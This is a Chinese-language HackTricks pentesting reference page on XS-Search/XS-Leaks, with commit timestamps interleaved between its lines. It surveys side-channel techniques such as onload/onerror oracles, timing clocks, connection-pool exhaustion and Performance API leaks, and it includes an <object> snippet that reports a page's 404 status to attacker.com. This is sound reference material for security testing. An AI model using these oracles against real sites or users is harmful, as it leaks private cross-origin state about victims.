hacktricks/pentesting-web/xs-search.md

956 lines
75 KiB
Markdown
Raw Normal View History

2022-10-11 23:16:53 +00:00
# XS-Search/XS-Leaks
2022-04-28 16:01:33 +00:00
<figure><img src="../.gitbook/assets/image (3) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
2022-08-31 22:35:39 +00:00
使用 [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) 可以轻松构建和**自动化工作流程**,利用全球**最先进**的社区工具。\
2023-08-03 19:12:22 +00:00
立即获取访问权限:
2022-08-31 22:35:39 +00:00
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
2022-04-28 16:01:33 +00:00
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
2022-04-28 16:01:33 +00:00
支持 HackTricks 的其他方式:
* 如果您想在 HackTricks 中看到您的**公司广告**或**下载 PDF 版本的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家 [**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** 上关注我们**。
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
2022-04-28 16:01:33 +00:00
</details>
## 基本信息
2022-06-27 23:34:20 +00:00
XS-Search 是一种利用**侧信道漏洞**来提取**跨源信息**的方法。
2022-06-27 23:34:20 +00:00
此攻击涉及的关键组件包括:
2022-06-27 23:34:20 +00:00
* **易受攻击的网站**:意图提取信息的目标网站。
* **攻击者的网站**:攻击者创建的恶意网站,受害者访问该网站,托管利用程序。
* **包含方法**用于将易受攻击的网站合并到攻击者的网站中的技术例如window.open、iframe、fetch、带有 href 的 HTML 标签等)。
* **泄漏技术**:用于通过包含方法收集的信息来区分易受攻击的网站状态差异的技术。
* **状态**:攻击者旨在区分易受攻击的网站的两种潜在状态。
* **可检测的差异**:攻击者依赖于推断易受攻击的网站状态的可观察变化。
2022-06-27 23:34:20 +00:00
### 可检测的差异
2022-06-27 23:34:20 +00:00
可以分析几个方面来区分易受攻击的网站的状态:
2022-06-27 23:34:20 +00:00
* **状态码**:区分跨源的**各种 HTTP 响应状态码**,如服务器错误、客户端错误或身份验证错误。
* **API 使用**:识别页面间**Web API 的使用**,揭示跨源页面是否使用特定的 JavaScript Web API。
* **重定向**:检测到导航到不同页面,不仅包括 HTTP 重定向,还包括由 JavaScript 或 HTML 触发的导航。
* **页面内容**:观察**HTTP 响应主体**或页面子资源的变化,例如**嵌入帧的数量**或图像大小的差异。
* **HTTP 标头**:注意特定 HTTP 响应标头的存在或可能的值,包括诸如 X-Frame-Options、Content-Disposition 和 Cross-Origin-Resource-Policy 等标头。
* **时间**:注意两种状态之间的一致时间差异。
2022-06-27 23:34:20 +00:00
2023-08-03 19:12:22 +00:00
### 包含方法
2022-06-27 23:34:20 +00:00
* **HTML 元素**HTML 提供各种元素用于**包含跨源资源**,如样式表、图像或脚本,迫使浏览器请求非 HTML 资源。可在 [https://github.com/cure53/HTTPLeaks](https://github.com/cure53/HTTPLeaks) 找到此类目的潜在 HTML 元素的汇编。
* **框架**:诸如 **iframe**、**object** 和 **embed** 等元素可以直接将 HTML 资源嵌入到攻击者的页面中。如果页面**缺乏框架保护**JavaScript 可以通过 contentWindow 属性访问嵌入资源的 window 对象。
* **弹出窗口****`window.open`** 方法在新标签页或窗口中打开资源,为 JavaScript 提供与 SOP 遵循后的方法和属性交互的窗口句柄。弹出窗口通常用于单点登录,绕过目标资源的框架和 cookie 限制。但是,现代浏览器限制弹出窗口的创建到某些用户操作。
* **JavaScript 请求**JavaScript 允许使用 **XMLHttpRequests****Fetch API** 直接请求目标资源。这些方法提供对请求的精确控制,例如选择是否跟随 HTTP 重定向。
2022-06-27 23:34:20 +00:00
### 泄漏技术
2022-06-27 23:34:20 +00:00
* **事件处理程序**:在 XS-Leaks 中的一个经典泄漏技术,其中事件处理程序如 **onload****onerror** 提供有关资源加载成功或失败的见解。
* **错误消息**JavaScript 异常或特殊错误页面可以直接提供泄漏信息,或通过区分错误消息的存在与不存在来提供信息。
* **全局限制**:浏览器的物理限制,如内存容量或其他强制执行的浏览器限制,可以在达到阈值时发出信号,作为泄漏技术。
* **全局状态**:可以利用与浏览器的**全局状态**(例如 History 接口)的可检测交互。例如,浏览器历史记录中的**条目数量**可以提供有关跨源页面的线索。
* **性能 API**:此 API 提供当前页面的**性能详细信息**,包括文档和加载资源的网络时间,从而推断请求的资源。
* **可读属性**:某些 HTML 属性是**跨源可读**的,可用作泄漏技术。例如,`window.frame.length` 属性允许 JavaScript 计算跨源网页中包含的帧数。
2022-06-27 23:34:20 +00:00
## XSinator 工具和论文
2022-06-28 15:48:43 +00:00
XSinator 是一个自动工具,用于**检查浏览器是否受到几种已知 XS-Leaks** 的影响,其在论文中有详细解释:[**https://xsinator.com/paper.pdf**](https://xsinator.com/paper.pdf)
2022-06-28 15:48:43 +00:00
您可以在 [**https://xsinator.com/**](https://xsinator.com/) **访问该工具**
2022-06-28 15:48:43 +00:00
{% hint style="warning" %}
**排除的 XS-Leaks**:我们不得不排除依赖**服务工作者**的 XS-Leaks因为它们会干扰 XSinator 中的其他泄漏。此外,我们选择**排除依赖特定 Web 应用程序中的配置错误和漏洞**的 XS-Leaks。例如跨源资源共享CORS配置错误、postMessage 泄漏或跨站脚本。此外,我们排除了基于时间的 XS-Leaks因为它们经常受到速度慢、嘈杂和不准确的影响。
2022-06-28 15:48:43 +00:00
{% endhint %}
2022-06-27 23:34:20 +00:00
<figure><img src="../.gitbook/assets/image (3) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
2022-08-31 22:35:39 +00:00
\
使用 [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) 可以轻松构建和**自动化工作流程**,利用全球**最先进**的社区工具。\
2023-08-03 19:12:22 +00:00
立即获取访问权限:
2022-08-31 22:35:39 +00:00
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
## **基于时间的技术**
以下一些技术将使用时间作为检测网页可能状态差异的过程的一部分。在Web浏览器中有不同的方法来测量时间。
**时钟**[performance.now()](https://developer.mozilla.org/en-US/docs/Web/API/Performance/now) API允许开发人员获取高分辨率的时间测量。\
攻击者可以滥用大量API来创建隐式时钟[Broadcast Channel API](https://developer.mozilla.org/en-US/docs/Web/API/Broadcast_Channel_API), [Message Channel API](https://developer.mozilla.org/en-US/docs/Web/API/MessageChannel), [requestAnimationFrame](https://developer.mozilla.org/en-US/docs/Web/API/window/requestAnimationFrame), [setTimeout](https://developer.mozilla.org/en-US/docs/Web/API/WindowOrWorkerGlobalScope/setTimeout), CSS动画等。\
更多信息:[https://xsleaks.dev/docs/attacks/timing-attacks/clocks](https://xsleaks.dev/docs/attacks/timing-attacks/clocks/).
2023-08-03 19:12:22 +00:00
## 事件处理程序技术
2022-06-27 23:34:20 +00:00
2022-06-28 12:20:37 +00:00
### Onload/Onerror
2022-06-27 23:34:20 +00:00
* **包含方法**框架HTML元素
* **可检测的差异**:状态码
* **更多信息**[https://www.usenix.org/conference/usenixsecurity19/presentation/staicu](https://www.usenix.org/conference/usenixsecurity19/presentation/staicu), [https://xsleaks.dev/docs/attacks/error-events/](https://xsleaks.dev/docs/attacks/error-events/)
* **摘要**如果尝试在onerror/onload事件中加载资源时会触发成功/失败加载资源的事件,可以推断出状态码。
* **代码示例**[https://xsinator.com/testing.html#Event%20Handler%20Leak%20(Script)](https://xsinator.com/testing.html#Event%20Handler%20Leak%20\(Script\))
2022-06-27 23:34:20 +00:00
2023-01-02 23:15:01 +00:00
{% content-ref url="xs-search/cookie-bomb-+-onerror-xs-leak.md" %}
[cookie-bomb-+-onerror-xs-leak.md](xs-search/cookie-bomb-+-onerror-xs-leak.md)
{% endcontent-ref %}
代码示例尝试从JS中加载脚本对象但也可以使用其他标签如对象、样式表、图像、音频。此外还可以直接注入标签并在标签内部声明`onload`和`onerror`事件而不是从JS中注入
2022-06-27 23:34:20 +00:00
这种攻击还有一个无需脚本的版本:
2022-06-27 23:34:20 +00:00
```html
<object data="//example.com/404">
2023-08-03 19:12:22 +00:00
<object data="//attacker.com/?error"></object>
2022-06-27 23:34:20 +00:00
</object>
```
在这种情况下,如果`example.com/404`未找到,将加载`attacker.com/?error`。
2022-06-27 23:34:20 +00:00
### Onload Timing
2022-06-28 15:48:43 +00:00
* **Inclusion Methods**: HTML Elements
* **Detectable Difference**: Timing (generally due to Page Content, Status Code)
* **More info**: [https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#onload-events](https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#onload-events)
* **Summary:** [**performance.now()**](https://xsleaks.dev/docs/attacks/timing-attacks/clocks/#performancenow) **API**可用于测量执行请求所需的时间。然而,也可以使用其他时钟,如[**PerformanceLongTaskTiming API**](https://developer.mozilla.org/en-US/docs/Web/API/PerformanceLongTaskTiming)该API可识别运行时间超过50毫秒的任务。
* **Code Example**: [https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#onload-events](https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#onload-events) 另一个示例在:
2023-01-02 14:57:39 +00:00
{% content-ref url="xs-search/performance.now-example.md" %}
[performance.now-example.md](xs-search/performance.now-example.md)
{% endcontent-ref %}
2022-06-28 15:48:43 +00:00
#### Onload Timing + Forced Heavy Task
2023-01-02 20:55:19 +00:00
这种技术与前一种类似,但**攻击者**还将在**答案为正或负时**强制执行某些操作以花费**相关的时间**,并测量该时间。
2023-01-02 20:55:19 +00:00
{% content-ref url="xs-search/performance.now-+-force-heavy-task.md" %}
[performance.now-+-force-heavy-task.md](xs-search/performance.now-+-force-heavy-task.md)
{% endcontent-ref %}
### unload/beforeunload Timing
2022-06-28 15:48:43 +00:00
* **Inclusion Methods**: Frames
* **Detectable Difference**: Timing (generally due to Page Content, Status Code)
* **More info**: [https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#unload-events](https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#unload-events)
* **Summary:** 可使用[SharedArrayBuffer时钟](https://xsleaks.dev/docs/attacks/timing-attacks/clocks/#sharedarraybuffer-and-web-workers)来测量执行请求所需的时间。也可以使用其他时钟。
* **Code Example**: [https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#unload-events](https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#unload-events)
2022-06-28 15:48:43 +00:00
通过利用[`unload`](https://developer.mozilla.org/en-US/docs/Web/API/Window/unload\_event)和[`beforeunload`](https://developer.mozilla.org/en-US/docs/Web/API/Window/beforeunload\_event)事件,可以测量获取资源所需的时间。**`beforeunload`**事件在浏览器即将导航到新页面时触发,而**`unload`**事件发生在实际导航时。可以计算这两个事件之间的时间差来确定浏览器获取资源所花费的时间。
2022-06-28 15:48:43 +00:00
### Sandboxed Frame Timing + onload <a href="#sandboxed-frame-timing-attacks" id="sandboxed-frame-timing-attacks"></a>
2022-06-28 15:48:43 +00:00
* **Inclusion Methods**: Frames
* **Detectable Difference**: Timing (generally due to Page Content, Status Code)
* **More info**: [https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#sandboxed-frame-timing-attacks](https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#sandboxed-frame-timing-attacks)
* **Summary:** 可使用[performance.now()](https://xsleaks.dev/docs/attacks/timing-attacks/clocks/#performancenow) API来测量执行请求所需的时间。也可以使用其他时钟。
* **Code Example**: [https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#sandboxed-frame-timing-attacks](https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#sandboxed-frame-timing-attacks)
2022-06-28 15:48:43 +00:00
观察到,在缺乏[框架保护](https://xsleaks.dev/docs/defenses/opt-in/xfo/)的情况下攻击者可以测量页面及其子资源通过网络加载所需的时间。这通常是可能的因为仅当iframe的`onload`处理程序在资源加载和JavaScript执行完成后才会触发。为了绕过脚本执行引入的变化攻击者可能会在`<iframe>`内使用[`sandbox`](https://developer.mozilla.org/en-US/docs/Web/HTML/Element/iframe)属性。包含此属性会限制许多功能特别是JavaScript的执行从而促进主要受网络性能影响的测量。
```javascript
// Example of an iframe with the sandbox attribute
<iframe src="example.html" sandbox></iframe>
```
2022-06-28 15:48:43 +00:00
### #ID + error + onload
* **包含方法**: 框架
* **可检测差异**: 页面内容
* **更多信息**:
* **摘要**: 如果您可以使页面在访问正确内容时出现错误,并在访问任何内容时正确加载,那么您可以创建一个循环来提取所有信息,而无需测量时间。
* **代码示例**:
2022-06-28 15:48:43 +00:00
假设您可以**插入**包含**秘密内容**的**页面**到**一个iframe**中。
2022-06-28 15:48:43 +00:00
您可以让受害者搜索包含“_**flag**_”的文件使用一个**iframe**例如利用CSRF。在iframe内您知道**`onload`事件**将**至少执行一次**。然后您可以通过仅更改URL中的**哈希**内容来**更改iframe的URL**。
2022-06-28 15:48:43 +00:00
2023-08-03 19:12:22 +00:00
例如:
2022-06-28 15:48:43 +00:00
1. **URL1**: www.attacker.com/xssearch#try1
2. **URL2**: www.attacker.com/xssearch#try2
2022-06-28 15:48:43 +00:00
如果第一个URL**成功加载**,那么当**更改**URL的**哈希**部分时,**`onload`**事件**不会再次触发**。但是,**如果**页面在**加载**时出现了某种**错误**,那么**`onload`**事件将**再次触发**。
2022-06-28 15:48:43 +00:00
然后,您可以**区分**一个**正确加载**的页面或访问时出现**错误**的页面。
2022-06-28 15:48:43 +00:00
### Javascript执行
2023-01-22 23:19:55 +00:00
* **包含方法**: 框架
* **可检测差异**: 页面内容
* **更多信息**:
* **摘要**: 如果**页面**返回**敏感内容**,或者用户可以**控制**的**内容**。用户可以在**负面情况下**设置**有效的JS代码**,并在**`<script>`**标签内**加载**每次尝试,因此在**负面**情况下,攻击者的**代码**将被**执行**,而在**肯定**情况下**不会**执行任何操作。
* **代码示例**:
2023-01-22 23:19:55 +00:00
{% content-ref url="xs-search/javascript-execution-xs-leak.md" %}
[javascript-execution-xs-leak.md](xs-search/javascript-execution-xs-leak.md)
{% endcontent-ref %}
2022-06-28 12:20:37 +00:00
### CORB - Onerror
* **包含方法**: HTML元素
* **可检测差异**: 状态码和标头
* **更多信息**: [https://xsleaks.dev/docs/attacks/browser-features/corb/](https://xsleaks.dev/docs/attacks/browser-features/corb/)
* **摘要**: **跨源读取阻止CORB**是一项安全措施,防止网页加载某些敏感的跨源资源,以防止**Spectre**等攻击。然而,攻击者可以利用其保护行为。当受**CORB**保护的响应返回一个带有`nosniff`和`2xx`状态码的_CORB受保护_`Content-Type`时,**CORB**会剥离响应的主体和标头。观察到这一点的攻击者可以推断**状态码**(指示成功或错误)和`Content-Type`(表示是否受**CORB**保护)的组合,从而导致潜在的信息泄漏。
* **代码示例**:
2022-06-28 12:20:37 +00:00
查看更多信息链接以获取有关攻击的更多信息。
2022-06-28 12:20:37 +00:00
### onblur
* **包含方法**: 框架
* **可检测差异**: 页面内容
* **更多信息**: [https://xsleaks.dev/docs/attacks/id-attribute/](https://xsleaks.dev/docs/attacks/id-attribute/), [https://xsleaks.dev/docs/attacks/experiments/portals/](https://xsleaks.dev/docs/attacks/experiments/portals/)
* **摘要**: 从id或name属性泄漏敏感数据。
* **代码示例**: [https://xsleaks.dev/docs/attacks/id-attribute/#code-snippet](https://xsleaks.dev/docs/attacks/id-attribute/#code-snippet)
2022-06-28 12:20:37 +00:00
可以**在iframe**内加载页面,并使用**`#id_value`**使页面**聚焦于iframe中的元素**,如果触发了**`onblur`**信号则ID元素存在。\
您可以使用**`portal`**标签执行相同的攻击。
2022-06-28 12:20:37 +00:00
### postMessage广播 <a href="#postmessage-broadcasts" id="postmessage-broadcasts"></a>
2022-06-28 15:48:43 +00:00
* **包含方法**: 框架,弹出窗口
* **可检测差异**: API使用
* **更多信息**: [https://xsleaks.dev/docs/attacks/postmessage-broadcasts/](https://xsleaks.dev/docs/attacks/postmessage-broadcasts/)
* **摘要**: 从postMessage中收集敏感信息或使用postMessages的存在作为一个预言机了解用户在页面中的状态
* **代码示例**: `任何监听所有postMessages的代码。`
应用程序经常使用[`postMessage`广播](https://developer.mozilla.org/en-US/docs/Web/API/Window/postMessage)在不同源之间进行通信。然而,如果未正确指定`targetOrigin`参数,此方法可能无意中暴露**敏感信息**,允许任何窗口接收消息。此外,接收消息本身可以充当**预言机**;例如,某些消息可能仅发送给已登录的用户。因此,这些消息的存在或不存在可以揭示有关用户状态或身份的信息,例如他们是否已经认证。
<figure><img src="../.gitbook/assets/image (3) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
使用[**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks)可以轻松构建和**自动化工作流**,使用全球**最先进**的社区工具。\
立即获取访问权限:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
## 全局限制技术
### WebSocket API
* **包含方法**: 框架,弹出窗口
* **可检测差异**: API使用
* **更多信息**: [https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) (5.1)
* **摘要**: 耗尽WebSocket连接限制会泄漏跨源页面的WebSocket连接数量。
* **代码示例**: [https://xsinator.com/testing.html#WebSocket%20Leak%20(FF)](https://xsinator.com/testing.html#WebSocket%20Leak%20\(FF\)), [https://xsinator.com/testing.html#WebSocket%20Leak%20(GC)](https://xsinator.com/testing.html#WebSocket%20Leak%20\(GC\))
可以确定目标页面使用多少个**WebSocket连接**。这使得攻击者可以检测应用程序状态并泄漏与WebSocket连接数量相关的信息。
如果一个**源**使用了**最大数量的WebSocket**连接对象,无论它们的连接状态如何,创建**新对象**将导致JavaScript异常。为执行此攻击攻击者网站在弹出窗口或iframe中打开目标网站然后在目标网站加载完成后尝试创建尽可能多的WebSocket连接。抛出的**异常数量**就是目标网站窗口使用的**WebSocket连接数量**。
### 支付 API
* **包含方法**: 框架,弹出窗口
* **可检测差异**: API 使用
* **更多信息**: [https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) (5.1)
* **摘要**: 检测支付请求,因为一次只能有一个处于活动状态。
* **代码示例**: [https://xsinator.com/testing.html#Payment%20API%20Leak](https://xsinator.com/testing.html#Payment%20API%20Leak)
这种 XS-Leak 使攻击者能够**检测跨源页面发起支付请求**。
由于**一次只能有一个请求支付处于活动状态**,如果目标网站正在使用支付请求 API任何**进一步尝试使用此 API 的尝试都将失败**,并导致**JavaScript 异常**。攻击者可以通过**定期尝试显示支付 API UI**来利用这一点。如果一次尝试导致异常,表示目标网站当前正在使用它。攻击者可以通过在创建后立即关闭 UI 来隐藏这些定期尝试。
### 计时事件循环 <a href="#timing-the-event-loop" id="timing-the-event-loop"></a>
* **包含方法**:
* **可检测差异**: 计时(通常由页面内容、状态码引起)
* **更多信息**: [https://xsleaks.dev/docs/attacks/timing-attacks/execution-timing/#timing-the-event-loop](https://xsleaks.dev/docs/attacks/timing-attacks/execution-timing/#timing-the-event-loop)
* **摘要**: 测量滥用单线程 JS 事件循环的网页执行时间。
* **代码示例**:
{% content-ref url="xs-search/event-loop-blocking-+-lazy-images.md" %}
[event-loop-blocking-+-lazy-images.md](xs-search/event-loop-blocking-+-lazy-images.md)
{% endcontent-ref %}
JavaScript 在[单线程事件循环](https://developer.mozilla.org/en-US/docs/Web/JavaScript/EventLoop)并发模型上运行,这意味着**一次只能执行一个任务**。这个特性可以被利用来衡量**来自不同源的代码执行所需的时间**。攻击者可以通过连续分派具有固定属性的事件来测量他们自己代码在事件循环中的执行时间。这些事件将在事件池为空时被处理。如果其他源也在向同一池中分派事件,**攻击者可以通过观察自己任务执行的延迟来推断外部事件执行所需的时间**。通过监视延迟来检测事件循环中的延迟,可以揭示来自不同源代码的执行时间,可能暴露敏感信息。
{% hint style="warning" %}
在执行计时中,可以**消除** **网络因素**以获得**更精确的测量**。例如,在加载页面之前加载页面使用的资源。
{% endhint %}
### 繁忙事件循环 <a href="#busy-event-loop" id="busy-event-loop"></a>
* **包含方法**:
* **可检测差异**: 计时(通常由页面内容、状态码引起)
* **更多信息**: [https://xsleaks.dev/docs/attacks/timing-attacks/execution-timing/#busy-event-loop](https://xsleaks.dev/docs/attacks/timing-attacks/execution-timing/#busy-event-loop)
* **摘要**: 一种测量网页操作执行时间的方法是故意阻塞线程的事件循环,然后计时**事件循环何时再次可用**。通过在事件循环中插入阻塞操作(如长时间计算或同步 API 调用),并监视后续代码开始执行所需的时间,可以推断在阻塞期间执行的任务的持续时间。这种技术利用了 JavaScript 事件循环的单线程特性,其中任务按顺序执行,并可以提供关于共享线程的其他操作性能或行为的见解。
* **代码示例**:
通过锁定事件循环来测量执行时间的技术的一个重要优势是其潜力可以规避**站点隔离**。**站点隔离**是一种安全功能,将不同网站分隔到单独的进程中,旨在防止恶意网站直接访问其他网站的敏感数据。然而,通过通过共享事件循环影响另一个源的执行时间,攻击者可以间接提取关于该源活动的信息。这种方法不依赖于直接访问其他源数据,而是观察该源活动对共享事件循环的影响,从而规避了**站点隔离**建立的保护屏障。
{% hint style="warning" %}
在执行计时中,可以**消除** **网络因素**以获得**更精确的测量**。例如,在加载页面之前加载页面使用的资源。
{% endhint %}
### 连接池
* **包含方法**: JavaScript 请求
* **可检测差异**: 计时(通常由页面内容、状态码引起)
* **更多信息**: [https://xsleaks.dev/docs/attacks/timing-attacks/connection-pool/](https://xsleaks.dev/docs/attacks/timing-attacks/connection-pool/)
* **摘要**: 攻击者可以锁定除 1 外的所有套接字,加载目标网页,同时加载另一页,直到最后一页开始加载的时间是目标页面加载所需的时间。
* **代码示例**:
{% content-ref url="xs-search/connection-pool-example.md" %}
[connection-pool-example.md](xs-search/connection-pool-example.md)
{% endcontent-ref %}
浏览器利用套接字进行服务器通信,但由于操作系统和硬件资源有限,**浏览器被迫对并发套接字数量施加限制**。攻击者可以通过以下步骤利用这种限制:
1. 确定浏览器的套接字限制例如256 个全局套接字。
2. 通过向各个主机发起 255 个请求来占用 255 个套接字一段时间,这些请求旨在保持连接打开而不完成。
3. 使用第 256 个套接字向目标页面发送请求。
4. 尝试向另一个主机发送第 257 个请求。由于所有套接字都在使用中(根据步骤 2 和 3此请求将排队等待直到套接字可用。在此请求继续之前的延迟为攻击者提供了有关与第 256 个套接字相关的网络活动的时间信息(目标页面的套接字)。这种推断是可能的,因为步骤 2 中的 255 个套接字仍在使用中,这意味着任何新可用的套接字必须是从步骤 3 释放的套接字。第 256 个套接字变为可用所需的时间直接与请求完成目标页面所需的时间相关联。
了解更多信息:[https://xsleaks.dev/docs/attacks/timing-attacks/connection-pool/](https://xsleaks.dev/docs/attacks/timing-attacks/connection-pool/)
### 按目标的连接池
* **包含方法**: JavaScript 请求
* **可检测差异**: 计时(通常由页面内容、状态码引起)
* **更多信息**:
* **摘要**: 这类似于前一种技术但不是使用所有套接字Google **Chrome** 将同一源的**并发请求限制为 6 个**。如果我们**阻塞 5 个**,然后**发起第 6 个**请求,我们可以**计时**它,如果我们设法使**受害页面发送**更多**请求**到同一端点以检测**页面的状态****第 6 个请求**将**花费更长时间**,我们可以检测到。
## 性能API技术
[`性能API`](https://developer.mozilla.org/en-US/docs/Web/API/Performance) 提供了有关Web应用性能指标的见解进一步由[`资源定时API`](https://developer.mozilla.org/en-US/docs/Web/API/Resource\_Timing\_API)丰富。资源定时API使监控详细的网络请求时间成为可能例如请求的持续时间。值得注意的是当服务器在其响应中包含 `Timing-Allow-Origin: *` 头时,将提供额外的数据,如传输大小和域查找时间。
这些丰富的数据可以通过诸如[`performance.getEntries`](https://developer.mozilla.org/en-US/docs/Web/API/Performance/getEntries)或[`performance.getEntriesByName`](https://developer.mozilla.org/en-US/docs/Web/API/Performance/getEntriesByName)等方法检索提供了性能相关信息的全面视图。此外该API通过计算从[`performance.now()`](https://developer.mozilla.org/en-US/docs/Web/API/Performance/now)获得的时间戳之间的差异便于测量执行时间。然而值得注意的是对于Chrome等浏览器中的某些操作`performance.now()` 的精度可能仅限于毫秒,这可能会影响时间测量的粒度。
除了时间测量之外性能API还可用于安全相关见解。例如在Chrome中`performance` 对象中页面的存在或不存在可以指示 `X-Frame-Options` 的应用。具体来说,如果由于 `X-Frame-Options` 而阻止页面在框架中呈现,则该页面将不会记录在 `performance` 对象中,为页面的框架策略提供了微妙的线索。
### 错误泄漏
* **包含方法**框架HTML元素
* **可检测差异**:状态码
* **更多信息**[https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) (5.2)
* **摘要**:导致错误的请求不会创建资源定时条目。
* **代码示例**[https://xsinator.com/testing.html#Performance%20API%20Error%20Leak](https://xsinator.com/testing.html#Performance%20API%20Error%20Leak)
可以**区分HTTP响应状态码**,因为导致**错误**的请求**不会创建性能条目**。
### 样式重新加载错误
* **包含方法**HTML元素
* **可检测差异**:状态码
* **更多信息**[https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) (5.2)
* **摘要**:由于浏览器错误,导致错误的请求加载两次。
* **代码示例**[https://xsinator.com/testing.html#Style%20Reload%20Error%20Leak](https://xsinator.com/testing.html#Style%20Reload%20Error%20Leak)
在先前的技术中还确定了两种情况即GC中的浏览器错误导致**加载失败时资源加载两次**。这将导致性能API中的多个条目因此可以检测到。
### 请求合并错误
* **包含方法**HTML元素
* **可检测差异**:状态码
* **更多信息**[https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) (5.2)
* **摘要**:导致错误的请求无法合并。
* **代码示例**[https://xsinator.com/testing.html#Request%20Merging%20Error%20Leak](https://xsinator.com/testing.html#Request%20Merging%20Error%20Leak)
在提到的论文中找到了该技术,但未在其中找到该技术的描述。但是,您可以在[https://xsinator.com/testing.html#Request%20Merging%20Error%20Leak](https://xsinator.com/testing.html#Request%20Merging%20Error%20Leak)中找到检查该技术的源代码。
### 空白页面泄漏
* **包含方法**:框架
* **可检测差异**:页面内容
* **更多信息**[https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) (5.2)
* **摘要**:空白响应不会创建资源定时条目。
* **代码示例**[https://xsinator.com/testing.html#Performance%20API%20Empty%20Page%20Leak](https://xsinator.com/testing.html#Performance%20API%20Empty%20Page%20Leak)
攻击者可以检测请求是否导致空的HTTP响应主体因为**某些浏览器中的空白页面不会创建性能条目**。
### **XSS审计泄漏**
* **包含方法**:框架
* **可检测差异**:页面内容
* **更多信息**[https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) (5.2)
* **摘要**使用安全断言中的XSS审计器攻击者可以通过观察当精心制作的有效负载触发审计器的过滤机制时响应中的变化检测特定网页元素。
* **代码示例**[https://xsinator.com/testing.html#Performance%20API%20XSS%20Auditor%20Leak](https://xsinator.com/testing.html#Performance%20API%20XSS%20Auditor%20Leak)
在安全断言SAXSS审计器最初旨在防止跨站脚本XSS攻击但却可以被利用来泄漏敏感信息。尽管这一内置功能已从Google ChromeGC中移除但仍存在于SA中。2013年Braun和Heiderich证明XSS审计器可能无意中阻止合法脚本导致误报。基于此研究人员开发了提取信息和检测跨源页面上特定内容的技术这一概念称为XS-Leaks最初由Terada报告由Heyes在博客文章中详细说明。尽管这些技术特定于GC中的XSS审计器但发现在SA中被XSS审计器阻止的页面不会在性能API中生成条目揭示了一种仍然可能泄漏敏感信息的方法。
### X-Frame泄漏
* **包含方法**:框架
* **可检测差异**:头部
* **更多信息**[https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) (5.2), [https://xsleaks.github.io/xsleaks/examples/x-frame/index.html](https://xsleaks.github.io/xsleaks/examples/x-frame/index.html), [https://xsleaks.dev/docs/attacks/timing-attacks/performance-api/#detecting-x-frame-options](https://xsleaks.dev/docs/attacks/timing-attacks/performance-api/#detecting-x-frame-options)
* **摘要**具有X-Frame-Options头的资源不会创建资源定时条目。
* **代码示例**[https://xsinator.com/testing.html#Performance%20API%20X-Frame%20Leak](https://xsinator.com/testing.html#Performance%20API%20X-Frame%20Leak)
如果页面**不允许**在**iframe**中**呈现**,则不会创建性能条目。因此,攻击者可以检测响应头部**`X-Frame-Options`**。\
如果使用**嵌入** **标签**,情况也是一样的。
### 下载检测
* **包含方法**:框架
* **可检测差异**:头部
* **更多信息**[https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) (5.2)
* **摘要**下载不会在性能API中创建资源定时条目。
* **代码示例**[https://xsinator.com/testing.html#Performance%20API%20Download%20Detection](https://xsinator.com/testing.html#Performance%20API%20Download%20Detection)
类似于所描述的XS-Leak由于ContentDisposition头部而**下载的资源**也**不会创建性能条目**。这种技术适用于所有主要浏览器。
### 重定向开始泄漏
* **包含方法**: 框架
* **可检测差异**: 重定向
* **更多信息**: [https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) (5.2)
* **摘要**: 资源时间记录泄漏了重定向的开始时间。
* **代码示例**: [https://xsinator.com/testing.html#Redirect%20Start%20Leak](https://xsinator.com/testing.html#Redirect%20Start%20Leak)
我们发现了一个滥用某些浏览器行为的 XS-Leak 实例,这些浏览器为跨源请求记录了过多信息。标准定义了一组应该为跨源资源设置为零的属性。然而,在 **SA** 中,可以通过查询 **Performance API** 并检查 **redirectStart 时间数据** 来检测用户是否被目标页面 **重定向**
